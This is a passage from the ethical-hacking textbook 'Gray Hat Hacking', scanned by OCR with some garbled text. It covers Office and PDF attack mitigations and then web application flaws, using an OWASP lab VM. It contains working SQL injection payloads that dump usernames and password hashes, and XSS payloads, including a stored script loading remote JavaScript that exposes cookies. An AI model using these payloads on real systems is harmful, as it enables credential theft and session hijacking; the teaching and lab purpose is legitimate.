Microsoft Office content- type attacks from the first half of 2009. As you can see, the 
overwhelming majority of attacks attempt to exploit vulnerabilities patched years be- 
fore. Simply applying all security updates blocks most content-type attacks detected by 
Microsoft during this time period. 

Disable JavaScript in Adobe Reader 

Most recent Adobe Reader vulnerabilities have been in JavaScript parsing. Current ex- 
ploits for even those vulnerabilities that are not in JavaScript parsing depend on 
JavaScript to spray the heap with attacker shellcode. You should disable JavaScript in 
Adobe Reader. This may break some form-filling functionality, but that reduced func- 
tionality seems like a good trade-off, given the current threat environment. To disable 
JavaScript, launch Adobe Acrobat or Adobe Reader, choose Edit | Preferences, select the 
JavaScript category, uncheck the Enable Acrobat JavaScript option, and click OK. 




Figure 1 6-7 Distribution of Microsoft Office content-type attacks from first half of 2009 (Courtesy 
of Microsoft) 
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Enable DEP for Microsoft Office Application 
and Adobe Reader 

As discussed in the exploitation chapters, Data Execution Prevention (DEP) is an effec- 
tive mitigation against many real-world exploits. Anecdotally, enabling DEP for Micro- 
soft Office applications prevented 100 percent of several thousand tested exploit samples 
from successfully running attacker code. It will not prevent the vulnerable code from 
being reached, but it will disrupt the sequence of execution before the attacker's code 
begins to be run. DEP is enabled for Adobe Reader on the following platforms: 

• All versions of Adobe Reader 9 running on Windows Vista SP1 or Windows 7 

• Acrobat 9.2 running on Windows Vista SP1 or Windows 7 

• Acrobat and Adobe Reader 9.2 running on Windows XP SP3 

• Acrobat and Adobe Reader 8.1.7 running on Windows XP SP3, 

Windows Vista SP1, or Windows 7 

If you are running Adobe Reader on a Windows XP SP3, Windows Vista SP1, or 
Windows 7 machine, ensure that you are using a version of Adobe Reader that enables 
DEP by default. Microsoft Office does not enable DEP by default. However, Microsoft 
has published a "Fix It'' to enable DEP if you choose to do so. Browse to http://support 
.microsoft.com/kb/971766 and click the "Enable DEP" Fix It button. Alternately, Micro- 
soft's Enhanced Mitigation Experience Toolkit (EMET) tool can enable DEP for any 
application. You can download it at http://go.microsoft.com/fwlink/?LinkID=162309. 

References 

Adobe Secure Software Engineering Team (ASSET) blog blogs.adobe.com/asset/ 
Adobe security bulletins www.adobe.com/support/security/ 

CVE List search tool cve.mitre.org/cve/cve.html 
EMET tool (to enable DEP for any process) 
go.microsoft.com/fwlink/?LinkID= 162309 

"How Do I Enable or Disable DEP for Office Applications?" (Microsoft) 

support.microsoft.com/kb/971766 

Microsoft security bulletins technet.microsoft.com/security 
Microsoft Security Intelligence Report www.microsoft.com/security/sir 
Microsoft Security Research and Defense team blog blogs.technet.com/srd 
Microsoft Security Response Center blog blogs.technet.com/msrc 
"Understanding DEP as a Mitigation Technology Part 1" (Microsoft) 
blogs.technet.com/srd/archive/2009/06/12/ 
understanding-dep-as-a-mitigation-technology-part- 1 .aspx or 
"Understanding DEP as a Mitigation Technology Part 2 " (Microsoft) 
blogs.technet.com/srd/archive/2009/06/12/ 
understanding-dep-as-a-mitigation-technology-part-2.aspx 
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CHAPTER 



Web Application Security 
Vulnerabilities 



In this chapter, you will learn about the most prevalent security vulnerabilities present 
in web applications today. We begin with a general introduction to the top two most 
prevalent types of web application security vulnerabilities, and then we address each in 
turn by providing practical background information and hands-on practice opportuni- 
ties to discover and exploit the vulnerabilities. This chapter serves as a template that you 
can use to explore other common web application security vulnerabilities. The topics 
are presented as follows: 

• Overview of top web application security vulnerabilities 

• SQL injection vulnerabilities 

• Cross-site scripting vulnerabilities 

Overview of Top Web Application Security 
Vulnerabilities 

The Open Web Application Security Project (OWASP) publishes an annual list of the 
most critical web application security flaws. You can find the OWASP Top 10 for 2010 
list at www.owasp.org/index.php/Category:OWASP_Top_Ten_Project. The top two 
flaws from the past several years have been injection vulnerabilities and cross-site script- 
ing vulnerabilities, so we'll start by introducing those. The rest of the chapter explains 
how to find, exploit, and prevent one type of injection vulnerability, SQL injection, and 
then how to find, exploit, and prevent cross-site scripting vulnerabilities. 

Injection Vulnerabilities 

Web application injection vulnerabilities result from poor input validation. The three 
most common forms of injection vulnerabilities are as follows: 



Command injection vulnerabilities Allow a parameter to be passed to a 
web server and executed by the operating system. This type of vulnerability 
can completely compromise a web server. 



361 




Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

362 



• SQL injection vulnerabilities Allow an attacker to manipulate, due to poor 
input validation, a SQL statement being passed from the web application to 
its back-end database and then execute the modified SQL statement. These 
injections can lead to disclosure of data stored in the database and potentially 
complete compromise of the database server. We will be covering SQL injection 
extensively in this chapter. 

• LDAP injection vulnerabilities Allow attacker-controlled modification of 
LDAP queries issued from the web server hosting the web application. These 
vulnerabilities can lead to information disclosure and potentially unauthorized 
attacker access via manipulation of authentication and lookup requests. 

Cross-Site Scripting Vulnerabilities 

Applications are vulnerable to cross-site scripting (XSS) when they permit untrusted, 
attacker-provided data to be actively displayed or rendered on a web page without be- 
ing escaped or encoded. An attacker allowed to inject script into a web page opens the 
door to website defacement, redirection, and session information disclosure. We will 
be covering XSS later in the chapter. 

The Rest of the OWASP Top Ten 

The following are the other eight types of vulnerabilities on the OWASP Top 10 for 2010 
list. You can find much more information about each of these vulnerability classes at 
www. owasp . org. 

• Broken Authentication and Session Management 

• Insecure Direct Object References 

• Cross-Site Request Forgery (CSRF) 

• Security Misconfiguration 

• Insecure Cryptographic Storage 

• Failure to Restrict URL Access 

• Insufficient Transport Layer Protection 

• Unvalidated Redirects and Forwards 

Reference 

OWASP Top 10 for 2010 list 

www. owasp . org/ index, php/ Category : OWASP_Top_Ten_Pro j ect 

SQL Injection Vulnerabilities 

Any web application that accepts user input as the basis of taking action or performing 
a database query may be vulnerable to SQL injection. Strict input validation prevents 
injection vulnerabilities. To understand this class of vulnerabilities, let's look at the com- 
ponents involved in servicing a web application request made by a user. Figure 17-1 
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Web page 



Response 



Request 




Response 



Request 




Web server 



Database server 



Request received: 

Authenticate, authorize, 
build query, and send to 
database server 



Request received: Verify 
authentication, verify 
authorization, process query 



Response: Return error on 



Response: Build web page results 
based off query response; 
return to browser 



Figure 17-1 Communication between web application components 



shows the components that handle the request and shows the communication between 
each component. 

As you can see, the web server receives the request and verifies the requesting user's 
access rights to make the request. The web server then validates the request and queries 
the database server for the information needed to service the request. Figure 17-2 shows 
what the user's browser might display in a simple web application accepting user input 
and the corresponding HTML page source. 

The example web application's JSP source code is shown in Figure 17-3. 

When a web application user clicks the Submit Query button on the web form, the 
value present in the input box is used without validation as a component in the SQL 
query. As an example, if the username "bob" were to be submitted, the following HTTP 
request would be sent to the web server: 

http : / /vulnerablewebapp . com/vulnerable_page . j sp?user=bob 



Wphnaao IfliontRrnu/corl 




InputBox: "user" will equal what is typed 



Submit Query 



Submit Query with variable "user' 



Web Page Source: 

<form method="GET"> 

<input type="text" name="user" /xinput type="submit" /> 
</form> 




Figure 1 7-2 Simple web page example accepting user input 
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Web Server (Code Running On Server) 

This web server is written in JSP: 

<% ____ 

String lookuf = req.getParameter! "user" ); 

if( req != null) 



Set the string "lookup" equal to value of 
"user" from the request that was submitted 




Build a 
table 




%> 



} 



%> 



Set up a connection to the database server 



<table> .. 

<% kT 

Statement gt; = 

ResultSet £§ = st.exeeuteQueiy! "SELECT * from table where user„id = + lookup + 



try{ ^ 

while! rs.nextO) Try to perform the query 

{ 

%xtrxtdx%= rs.getString! 1 ) %></td></tr>< 0 -6 

} 

} catch! SQLException e ) 8 



%> 

</table> 

<% 



); 



Figure 17-3 JSP source for web application querying based on user input 



When the web server receives this request, the JSP variable lookup is set to "bob." 
Because the request is not null, the web application begins building the page to be re- 
turned to the client. It first opens an HTML <TABLE> element to contain the result of 
the user's search. It then builds and performs a SQL query to be sent to the database 
server. In our "bob" example, the SQL request would be the following: 

SELECT * FROM table WHERE user_id = ’bob' 

The SQL server would process this query and return the result to the web application, 
which would in turn return the result within a table to the client's browser. 

However, this pattern could potentially result in a SQL injection security vulnerability 
if the requested user_id sent by the user manipulated the SQL query. A common character 
used as a simple check for SQL injection is a single quote ('), as demonstrated here: 

http : //vulnerablewebapp . com/vulnerable_page . j sp?user = 1 

The web application would then build and send the following invalid SQL query: 

SELECT * from table where user id = 1,1 
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From here, we can cause the web application to execute different SQL statements 
from those its developer intended it to execute. Most SQL injection attacks follow this 
same pattern, causing the web application to perform requests that were not originally 
intended. Each type of vulnerability will have a different syntax and implementation, 
but each follows the same concept. 

We will dig deeper into SQL injection attacks shortly to see what is possible with 
that specific class of injection attack, but first we need to cover a little SQL database 
background. 

SQL Databases and Statements 

Databases store data in a structured manner that allows easy retrieval and cross-refer- 
encing. Organizing the data in a "relational" manner makes it easier to query and re- 
trieve any data in the database. Relational databases store data in tables organized by 
rows and columns. Entries in different tables can cross-reference each other via a unique 
identifier for each row. A table of user information in a relational database might look 
something like the table shown in Figure 17-4. 

Structured Query Language (SQL) is a standard method of managing relational 
databases. SQL defines a standard way of writing statements to create, modify, or query 
data within the database. The three major components of SQL are as follows: 

• Data Definition Language (DDL) Used to define or modify data structures 
such as tables, indexes, and database users 

• Data Manipulation Language (DML) Used to query or manipulate data 
stored in SQL databases 

• Data Control Language (DCL) Used to grant or deny access rights to the 
database 



Figure 1 7-4 

Sample Users table 



COLUMN 



Record_ID 


User_Name 


User_Age 


User_Phone 


1 


bob 


20 


555-555-5555 


2 


jack 


35 


111 - 111-1111 


3 


harry 


22 


222-222-2222 



ROW 
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Most of the interesting commands in the context of SQL injection attacks fall into 
the DML category. It's important to understand these commands to perform a success- 
ful SQL injection attack. The list of language elements in Table 17-1 includes many of 
the commands you'll need to know. 



Command 


Action 


Example 


SELECT 


Query data 


SELECT [column-names] FROM [table-name]; 
SELECT * FROM Users; 


UNION 


Combine result 
of two or more 
questions into a single 
result set 


[select-statement] UNION [select-statement]; 
SELECT column 1 FROM table 1 
UNION 

SELECT column 1 FROM table2; 


AS 


Display results as 
something different 
than the column name 


SELECT [column] AS [any-name] FROM [table-name]; 
SELECT column 1 AS User_Name FROM table 1 ; 


WHERE 


Return data matching 
a specific condition 


SELECT [column-names] FROM [table-name] WHERE 
[column] = [value]; 

SELECT * FROM Users WHERE User_Name = 'bob’; 


LIKE 


Return data matching 
a condition having a 
wildcard (%) 


SELECT [column-names] FROM [table-name] WHERE 
[column] like [value];SELECT * FROM Users WHERE 
User_Name LIKE ‘%jack%’; 


UPDATE 


Update a column in 
all matching rows 
with a new value 


UPDATE [table-name] set [column-name] = [value] 
WHERE [column] = [value]; 

UPDATE Users SET UserJName = ‘Bobby’ WHERE 
User_Name = ‘bob’; 


INSERT 


Insert rows of data 
into a table 


INSERT INTO [table-name] ([column-names]) VALUES 
([specific-values]);INSERT INTO Users (User_ 

Name, User_Age) VALUES (‘Jim’, ’25’); 


DELETE 


Delete all rows of data 
that match a condition 
from the table 


DELETE FROM [table-name] where [column] = [value]; 
DELETE FROM Users WHERE User_Name = ‘Jim’; 


EXEC 


Execute command 


EXEC [sql-command-name] [arguments to command] 
EXEC xp_cmdshell {command} 


Table 17-1 


Key SQL Commands 
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You'll also use several special characters to build SQL statements. The most com- 
mon are included in Table 17-2. 

Each database vendor implements SQL and structures built-in tables in a slightly 
different manner. You will need to tweak SQL statements slightly from one database to 
another. 

Testing Web Applications to Find SQL Injection 
Vulnerabilities 

Now that you understand the basics of SQL, let's get to the fun stuff. Alongside their list 
of top web application vulnerabilities, OWASP publishes a free, downloadable virtual 
machine image that runs several insecure web applications for testing. We'll use this 
"OWASP Broken Web Applications VM" to demonstrate how to find SQL injection vul- 
nerabilities. We encourage you to download the VM, load it into VMware Player or your 
VM player of choice, and follow along. You can find it at http://code.google.eom/p/ 
owaspbwa/. 



Character 


Function 


String indicator (‘string’) 


II 


String indicator (“string”) 


+ 


Arithmetic operation, or concatenate (combine) for MS SQL Server and DB2 


II 


Concatenate (combine) for Oracle, PostgreSQL 


concat(“”,””) 


Concatenate (combine) for MySQL 


* 


Wildcard (“All”) used to indicate all columns in a table 


% Wildcard (“Like”) used for strings: 

‘%abc’ (ending in abc) 

‘%abc%’ (containing abc) 


; Statement terminator 


0 


Group of data or statements 


- 


Comment (single line) 


# 


Comment (single line) 


^comment 4 / 


Multiline comment 



Table 17-2 Common SQL Special Characters 
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Figure 1 7-5 

OWASP Broken Web 
AppsVM 



Ue leone to the UUASP Broken Web Apps UM 

!!! This UH has nany serious security issues, ue strongly reconnenrt that you run 
it only in "host only” or "MAT" netuork in the uirtual nachlne settings ??? 

Yuu uan access the ueb apps at http :/ , /’172 . 16 . 104 . 128/' (for the Apache server) 
and http iss 172 . 16 . 194 . 128 : 8080,' (for the Toncat 3crvcr) 



You can adninister / configure this machine through the console here, by SSHing 
to 172. 16.104.128, uia Sanba at \M72 . 16 . 104 . 128\. or via phpnyadnln at 
http ://172 . 16 . 104 . 128/phpnyadn in . 



When the boot sequence finishes, the OWASP BWA VM will display its IP address, 
as shown in Figure 17-5. Browse to the IP address followed by dvwa/login.php. Us- 
ing the IP address from Figure 17-5, for example, the correct URL would be 
http://172.16.104.128/dvwa/login.php. Log in with the username user and password 
user. Well demonstrate simple SQL injection using the BWA VM. 

Simple SQL Injection 

In the bottom-left corner of the DVWA "Welcome" web page, you'll see "Security Level: 
high" (see Figure 17-6). This is the default security setting for DVWA. To demonstrate 
simple SQL injection, click the DVWA Security button (also shown in Figure 17-6) to 
change script security from high to low. Click the Submit button to save the change. 

Next, click the SQL Injection button in the menu along the left side of the DVWA 
interface. (Alternatively, browse to http://IP/dvwa/vulnerabilities/sqli/.) You'll be pre- 
sented with the input form shown in Figure 17-7. 

Let's first check for SQL injection by testing with a single quote as we did in the 
demonstration earlier in the chapter. Typing ' and clicking Submit returns the following 
SQL error message: 

You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 1 1 ' ' ' at line 1 

This SQL error message reveals that a statement was submitted having an unmatched 
(an odd) number of single quote characters ('). This application is probably vulnerable 
to SQL injection. To exploit it, we'll need to send a matching ' to terminate the string 



Figure 1 7-6 

DVWA Security 
Level setting 



DVWA Security 
PHP Info 
About 

Logout 



Socurity Lovol: high 
PHPIDS: disabled 
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Figure 17-7 

DVWA SQL 
injection input form 



User ID: 

f Submit 1 



and then append our own SQL to the statement. Our goal is to steal passwords. The first 
step is to extract the entire list of users. We'll need to find a way to manipulate the string 
that is passed in to execute a valid SQL statement that returns all users. This is much 
easier to do when a web application exposes error messages to us, as DVWA does at its 
"Easy" Security Level setting. 

Start by sending two single quotes. You'll notice that the query completes success- 
fully (the SQL statement is well formed), but no data is returned. That attempt tells us 
that our attack string should contain two single quotes to be valid SQL. We can assume 
that the value submitted by the user and passed to the database is criteria to a SELECT 
statement. It probably looks something like "SELECT [columns] from [table] where 
criteria = [criteria]." If we can manipulate this SQL statement to append OR 1 = 1, the 
[columns] from every row in the [table] will be returned. Try adding OR 1 = 1 between 
the single quotes, as follows: 

1 OR 1=1 ' 

This time we get a different SQL error message: 

You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near ’ 1 ' 1 at line 1 

This SQL error message tells us that we have the correct number of single quotes but 
that something is still wrong with our query. Perhaps commenting out everything after 
our portion of the SQL statement will make the error go away. Remember from Table 
17-2 that the -- sequence (two dashes) causes the rest of the line to be ignored (single- 
line comment). Let's add that to work around the SQL error currently being returned. 
Use the following attack string: 

' OR 1=1 — ' 

Bingo! This returns all users, as shown in Figure 17-8. 




The following string would also work: 
' 1 '=' 1 
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Figure 17-8 

Initial successful 
SQL injection 



User ID: 



[ Submit f 

ID: ' or 1-1 — ' 

First name: admin 
Surname: admin 

ID: ' or 1-1 — ' 

Firct narr.oi Gordon 
Surname: Brown 

TO : ’ or 1-1 — ' 

First name: Hack 
Surname: Me 

ID: ' or 1-1 
First name: Pablo 
Surname: Picasso 

ID: ' or 1-1 
First name : bob 
Surname: smith 



After detecting that an input field was vulnerable to SQL injection, the trick was just 
to find the correct number of terminating characters to avoid the SQL error, find the 
right SQL elements to return all rows, and then find the right SQL special characters to 
either ignore the rest of the statement or work around the quotes added by the web ap- 
plication. 

Now that we have found a way to append to the web application's SELECT statement, 
we're halfway done. We need to find where the passwords are stored, and find a way to 
display those passwords on the web page in response to our injection. Our strategy to do 
so will be to use the UNION command to combine the results of a second SELECT state- 
ment. We'll also use the concat() function to make the display easier to read. 

To combine the results of two SELECT statements without error, both statement 
results must return the same number of columns. The injected SQL statement sent by 
DVWA to the database currently looks something like this: 

SELECT [columns] from [table] where criteria = [criteria] OR 1=1 -- 

We don't know yet how many columns are included in that [columns] list. Finding 
this count of columns is the next step. One strategy is to try combining the result of the 
query with a SELECT statement returning one column. If that doesn't work, we'll try 
two columns... and so on until the web application no longer returns an error. The in- 
jection string to try one column would be as follows: 

' UNION SELECT NULL — 1 

In this case, the web application returns the following SQL error: 

The used SELECT statements have a different number of columns 
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Next, try two columns using the following injection string: 

' UNION SELECT NULL, NULL — ' 

Got it! The web application does not return a SQL error this time. Instead, we get 
the result shown in Figure 17-9. Therefore, we know that the web application's SQL 
statement into which we are injecting looks something like the following: 

SELECT [columnl], [column2] from [table] where criteria = [criteria] 

Now that we know the number of columns in the SELECT statement, we can use the 
UNION command to gather more information from the database, with the end goal of 
finding passwords. Databases have a special object from which you can SELECT called 
INFORMATION_SCHEMA. This object includes the names of every table, the names of 
every column, and other metadata. Here's an injection string to return all tables: 

' UNION SELECT NULL, table_name from INFORMATION_SCHEMA. tables — ' 

In the resulting list, you'll see a number of built-in MySQL tables (CHARACTER_ 
SETS, COLLATIONS, and so on) and then two tables at the end that look like they are 
probably part of DVWA (guestbook, users): 

Surname: guestbook 
Surname: users 

That users table looks interesting. Let's get a listing of columns in the users table 
using the following injection string: 

1 UNION SELECT NULL, column_name from INFORMATION_SCHEMA. columns 
where table name = 'users' -- ' 



We see the following six columns: 



Surname : 
Surname : 
Surname : 
Surname : 
Surname : 
Surname : 



user_id 

first_name 

last_name 

user 

password 

avatar 



Figure 17-9 

SELECT statement 
has two columns 



User ID: 



( Submit ) 

ID: ' UNION SELECT NULL, NULL — 

First names 

Surname: 
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There's the password column we were looking for! We can again use the UNION 
command to select all the passwords in the users table using the following injection 
string: 

1 UNION SELECT NULL, password from users -- ' 

Bingo! Here are the MD5-obfuscated passwords for every user in the database: 

Surname : 21232f297a57a5a743894a0e4a801fc3 
Surname: e99al8c428cb38d5f260853678922e03 
Surname : 8d3533d75ae2c3966d7e0d4f cc 6 92 16b 
Surname : 0dl07d09f 5bbe40cade3de5c71e9e9b7 
Surname : eellcbbl9052e40b07aac0ca060c23ee 

We could cross-reference this password list with the list of users displayed in Figure 
17-8. To make it even easier, however, we can just use the other column in our injected 
SELECT statement to fetch the user's name. We can even display multiple fields (such as 
"first_name" [space] "last_name" [space] "user") via the CONCAT keyword. The final 
winning injected SQL statement gathering all the information would be as follows: 

' UNION SELECT password, concat ( f irst_name, ' ', last_name, ' ', user) 
from users -- ' 

The final output of this SQL injection attack is displayed in Figure 17-10. 

Intermediate SQL Injection 

DVWA's "Easy" security mode included a trivial SQL injection target. Let's next look at 
a SQL injection target that is a bit more difficult. Mutillidae is a second web application 
included on the OWASP Broken Web Applications VM. Browse to it by typing in the IP 
address followed by /mutillidae. Using the IP address from Figure 17-5, the correct 
URL would be http://172.16.104.128/mutillidae. Click the "User info" link in the left 
margin's A2 - Injection Flaws section. You'll be presented with the user information 
lookup screen displayed in Figure 17-11. 



User ID: 



f Submit ~) 

ID: ‘ UNION SELECT password, concat (first_name, 

First name: 21232f 297a57a5a743894a0c4ae01fc3 

RurninsB! xdmin sdsin jsrbrin 

ID: ’ UNION SELECT password, concat ( £irst_name, 
First name: c99al8c428cb38dS£260853678922e03 
Surname: Cordon Brown gordonb 

XDt * UNION SELECT password, concat ( firsi_n an©. 
First nano: 8d3533d75ae2c3966d7e0d4fcc69216b 
Surname: Hack Me 1337 

ID: 1 UNION SELECT password, concat ( first_name, 

First naze. 0dl07d09f Dbbe40cadc3dc5c71c9c9b7 
Surna m e; Pablo Picasso pablo 

ID: ’ UNION SELECT password, concat ( firs t_name, 
First nane: eel 2cbbl9052e40b07aac0ca060c23ee 
surname: bob smith user 



last_namo, * user) from 



last_naae, * *, user) from 



last_name, * ', user) from 



last_name, * *, user) from 



last_name, * user) from 




Figure 17-10 Final SQL injection success 
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Figure 17-11 

Mutillidae user info 
SQL injection target 



Password: 



( Submit 



If you do not have an account. Register 

Enter your username an password below to view your intromation: 
Name: 



We won't give away the secret for the Mutillidae SQL injection, other than to say 
that you'll need to factor in both the name and password fields in your SQL injection 
statement. And remember that SQL includes a multiline comment by wrapping the 
comment between /* and */ sequences. 

Reference 

OWASP Broken Web Applications Project code.google.com/p/owaspbwa 

Cross-Site Scripting Vulnerabilities 

Cross-Site Scripting (XSS) is second in the list of OWASP's Top 10 for 2010 web applica- 
tion vulnerabilities. Web applications frequently have, and will likely continue to have 
for a number of years, XSS vulnerabilities. Unlike the injection attacks described in the 
first half of this chapter, XSS vulnerabilities primarily impact the users of the web 
application, not the web application itself. In this section, we will explore XSS, first 
explaining what causes this class of vulnerability, then explaining how it can be de- 
tected, and finally demonstrating how it is exploited. 

Explaining “Scripting” 

Let's first explain the "scripting" part of cross-site scripting. Most major websites today 
use JavaScript (or sometimes VBScript) to perform calculations, page formatting, cook- 
ie management, and other client-side actions. This type of script is tun on the browsing 
user's computer (client side) within the web browser, not on the web server itself. Here's 
a simple example of scripting: 

<html> 

<head> 

</head> 

<body> 

<script type= "text/ javascript "> 

document. write ("A script was used to display this text"); 

</ script> 

</body> 

</html> 

In this simple example, the web page instructed the web browser via JavaScript to 
write the text A script was used to display this text. When the web browser executes 
this script, the resulting page looks like Figure 7-12. 
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The user browsing to this website would have no idea that script running locally 
transformed the content of the web page. From the rendered view within the browser, 
it doesn't appear to be any different from a static TITML page. Only if a user were to 
look at the HTML source could they see the JavaScript, as shown in Figure 7-13. 

Scripting support is included in most browsers and is typically enabled by default. 
Web application developers have become accustomed to using script to automate 
client-side functions. It is important to note that script being enabled and used is not 
the cause of the vulnerabilities we'll be discussing in this section. It is only when a web 
application developer makes a mistake that scripting becomes dangerous. Without 
web application flaws, scripting is safe and is a good tool to enable a rich user experience. 

Explaining Cross-Site Scripting 

Web application flaws that lead to cross-site scripting are generally input validation 
vulnerabilities. A successful XSS attack involves two steps. First, the attackers send to a 
web application a request that the web application does not properly sanitize or vali- 
date as being properly formatted. Second, the web application returns to the attacker, 



Figure 17-13 

Simple script 
example page 
source view 



Q) Simple_Exaple.html :■ J Q) view-source:file///C:/Us... 

f 3 C H ^ view-source:http://Simple_Exaple.html 



i B \md2mi 



D- A 



1 <html> 

2 <head> 

3 </head> 

4 

5 <body> 

7 < script type="text/ javascript "> 

s document .write ("A script was used to display this text"); 

5 </script> 

11 </body> 

12 </html> 
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without encoding, a web response page that includes the improperly formatted input. 
Some examples of the characters that are used for XSS include <&<>"' and /. These 
characters should be encoded, preferably using hex, or escaped when being returned 
to the browser. The OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet is a 
project that provides guidance on properly protecting against XSS. It can be found at 
www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet. 

There are three types of cross-site scripting: reflected XSS, stored XSS, and DOM- 
based XSS. Reflected and stored XSS are the two more common types of XSS and will 
be explained in the following sections. DOM-based XSS is a bit different and less prev- 
alent and thus will not be discussed further in this chapter. 

Reflected XSS 

Web applications commonly accept input as parameters passed from the browser as 
part of a GET or POST request. For example, a GET request passing in the parameter 
"ID" with value "bob" might look like the following: 

http : //www. example . com/account-lookup . asp?ID=bob 

POST requests also pass in parameters, but you'll need to view the HTTP request 
with a tool such as the Firefox Tamper Data plug-in or a packet sniffer to see the param- 
eters and values. When a web application returns back ("reflects") the passed-in param- 
eters in the response page, the potential for reflected XSS exists. Both GET and POST 
requests are valid targets for XSS. Let's look at a simple vulnerable ASP page: 

<form action= M welcome . asp" method =,, get n > 

Your name: cinput type= M text" id="name" size="20" /> 
cinput type= n submit" value="Submit" /> 

</form> 

<% 

dim name 

name=Request . Querystring ( "name" ) 

If id<>"" Then 

Response .Write ( "Hello " & name & "!<br />”) 

End If 

%> 



This ASP page places the value passed in for parameter id into a variable named 
name. It then writes the passed-in value directly into the response. The page would look 
something like Figure 17-14. 

Because the web page does not validate the passed-in value and displays it verbatim 
in the response page, this page is vulnerable to an XSS attack. Instead of "Bob, " an at- 
tacker could pass in script such as the following to simply pop up a dialog box: 

<script>alert ( 1 XSS 1 ) </ script> 

In that case, the resulting web page would look more like Figure 17-15. 



Your name: Bob 



Figure 17-14 

Sample vulnerable 
ASP page 



Hello Bob' 



Submit 
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Figure 17-15 

Sample vulnerable 
ASP page XSS 
example 



Your run* Svfcr** 

Hefe' 




As you can see, the passed-in script was executed within the client-side browser. The 
alert box proves that the web application is vulnerable to a reflected XSS attack. Later in 
this chapter, we will explain how a script passed in to a request and reflected in the 
response can be used for more than just displaying an alert box. But first, well explain 
stored XSS. 

Stored XSS 

Stored XSS is similar to reflected XSS in that unencoded attacker script is displayed in a 
web application web page. The difference is that the script in stored XSS does not come 
from the web application request. Instead, the script is stored by the web application as 
content to be displayed to browsing users. For example, a forum or blog that allows users 
to upload content without properly validating or encoding it may be vulnerable to a 
stored XSS attack. Stored XSS is possible not just as part of a text field; it can be included 
as part of an image tag or just about any user-editable content on a web application. 

Let's take a look at an example stored XSS vulnerability. We'll use the same Mutil- 
lidae application from the OWASP BWA VM that we introduced as part of the "Interme- 
diate SQL Injection" section earlier in the chapter. To follow along, browse to http:// 
[IP-address-of-the-VM]/mutillidae, log in with the username user and the password 
user, and click the "Add to your blog" link in the left margin's A1 - Cross Site Scripting 
(XSS) section. In this example, we will be posting an entry to the user blog, storing at- 
tack script for an unsuspecting victim to view. The website http://ha.ckers.org contains 
a convenient demonstration script we'll use for this example. The "blog entry" then 
would look like the following: 

<SCRIPT/XSS SRC="http: //ha. ckers.org/xss. js"x/SCRIPT> 

Figure 17-16 is a screenshot of this malicious blog post. 

The ha.ckers.org JS file to which we are linking contains the following script: 



document . write ("This is remote text via xss.js located at ha.ckers.org " + 
document . cookie) ; alert ("This is remote text via xss.js located at ha.ckers.org 
+ document . cookie) ; 



When we click Submit and then simulate viewing the blog as an unwitting victim 
(by clicking the "View someone's blog" link), the attack script stored at ha.ckers.org 
runs in the context of the Mutillidae website. You can see the result of this attack in 
Figure 17-17. 
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„v Disable- £ Caekirr CSS- Forms- Imagrr O Information" Mrirrllanrein- , Outfcir* , * Freer* Toots* •- VWw Source- Options* 



1 Kttp^/ 1 <t?. 1 M.? 47 ... to your hUvyphp 



Mutillidae: Hack, Learu, Secure, Have Fun!!! 



You are logged in as user 



Core Controls 

Hot nr 



W elcome to your Nor. l ave an entry Login, or you will he Stfed as 'anonymous* 



cSCRIPT/XSS SRC— ftctp : //ha . clcera . org/xaa . 3 3"></SCRiri> 



Submit 



View someone' 



o 192-168-247130 QQQQQ3 



Figure 17-16 Mutillidae stored XSS example 



* C X ^ I http: .192. 168.2421 30 'mutiEi(i*e/inde».php?p*g«i view- someonevblc 3 php •*§ - 

^ Disable- 5 Cookies- CSS- forms- < [mages- Q Information- Mistetaoeovs- . Outline- ] v Resue- Tools- <-• View Source* Options- 



Mutillidae: Hack, Learn, Secure, Have Fun!!! 



You are logged In as user 



Version 1.3 



Core Controls 



Show only: Choose someone 



ns«r:(i010-0S-06 04:1159) 

Thk t< remote text via *« jc located at ha elce»< org nid=2 



The page at http-//192 168247.130 says: 



someone 



Browser info 



Show lot 



Figure 17-17 Mutillidae stored XSS attack result 
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Attack Possibilities with XSS 

Our demonstration XSS attacks have simply displayed an alert box or displayed text and 
a cookie ID on the page. While these examples have only displayed information, far 
more damaging attacks are possible. For example, the malicious script could post the 
cookie values to an attacker's website, potentially allowing an attacker to log in as the 
user or resume an in-process session. The script could also rewrite the content of the 
page, making it appear as if it has been defaced. JavaScript can easily carry out any of 
the following attacks: 

• Session hijacking via cookie theft 

• Keystroke logging, posting any typed-in text to an attacker website 

• Website defacement 

• Link or advertisement injection into the web page 

• Immediate page redirect to a malicious website 

• Theft of logon credentials 

Attackers have recently leveraged XSS vulnerabilities on popular social networking 
sites to create an "XSS worm," spreading from one user's page to another. XSS worms 
could be leveraged to perform denial-of-service or brute-force attacks unbeknownst to 
the user. 

A fun way to explore the power of XSS attacks is to install the Browser Exploitation 
Framework (BeEF) from bindshell.net. Exploiting a victim via an XSS vulnerability can 
turn their browser into a "zombie" controlled by the BeEF command-and-control inter- 
face. BeEF can force a browser to visit a malicious website, log keystrokes, detect if a 
browser is using Tor (from www.torproject.org), perform port scans, and even run 
Metasploit attack modules. It's a great demonstration of the power of XSS attacks. 

References 

Browser Exploitation Framework www.bindshell.net/tools/beef 

Firefox Tamper Data plug-in addons.mozilla.org/en-US/firefox/addon/966/ 

Popular web application security website ha.ckers.org/ 

OWASP Broken Web Applications Project code.google.com/p/owaspbwa 
OWASP XSS Prevention Cheat Sheet www.owasp.org/index.php/XSS_ 
(Cross_Site_Scripting)_Prevention_Cheat_Sheet 
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CHAPTER 



VoIP Attacks 



The growing popularity of IP telephony services is stimulating real concern over VoIP 
security. With potential security threats including attacks that disrupt service and at- 
tacks that steal confidential information, we must pinpoint and resolve any vulnerabil- 
ities in the VoIP network prior to the occurrence of a network breach, and prepare the 
network to deter any such attacks. In a time of global uncertainty, VoIP security exploits 
such as those related to denial of service can have a detrimental result of significant 
outages that affect our entire global infrastructure. Additional exploits related to service 
theft can cost in the billions of dollars to recover from and recoup service. With such 
emphasis today on the way we communicate in our daily lives, it is absolutely critical 
that we put preventative measures into place to prevent these hazards from occurring. 
These measures include drilling down into the depths of our technology in order to 
seek and resolve even the smallest fault. This is the moment and prized opportunity for 
the gray hat hacker to utilize his or her knowledge and expertise to drive a well-thought- 
out security initiative using techniques that we will discuss in this chapter, such as 
